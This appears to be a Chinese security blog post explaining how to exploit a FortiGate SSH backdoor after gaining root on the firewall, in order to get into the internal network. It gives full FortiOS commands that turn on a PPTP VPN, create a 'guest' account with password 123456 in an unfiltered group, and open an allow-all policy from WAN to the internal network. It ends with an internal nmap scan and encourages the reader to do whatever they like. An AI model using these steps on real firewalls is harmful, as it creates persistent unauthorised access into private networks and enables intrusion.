飞塔SSH后门 进一步利用方法

昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)
那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。
这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的
vpn服务来进入到内网中 ,从而进行进一步渗透。
0X00 先看下用户组

  1. show user group


0x01开启vpn

  1. config vpn pptp
  2. set status enable
  3. set eip 192.168.200.100
  4. set sip 192.168.200.1
  5. set usrgrp Guest-group
  6. end
  7. config user local
  8. edit "guest"
  9. set type password
  10. set passwd 123456
  11. next
  12. end
  13. config user group
  14. edit "Guest-group"
  15. set profile "unfiltered"
  16. set member "guest"
  17. next
  18. end
  19. config firewall policy
  20. edit 9
  21. set srcintf "wan1"
  22. set dstintf "internal"
  23. set srcaddr "all"
  24. set dstaddr "all"
  25. set action accept
  26. set schedule "always"
  27. set service "ANY"
  28. next
  29. end


0x02 内网进一步渗透
查看路由表

  1. get router info routing-table all

这里已经成功连接上,并使用nmap扫描,这里记得你是防火墙root,所以你想去哪就去哪,想干嘛就干嘛。


转载请注明:安全工具箱 » 飞塔SSH后门 进一步利用方法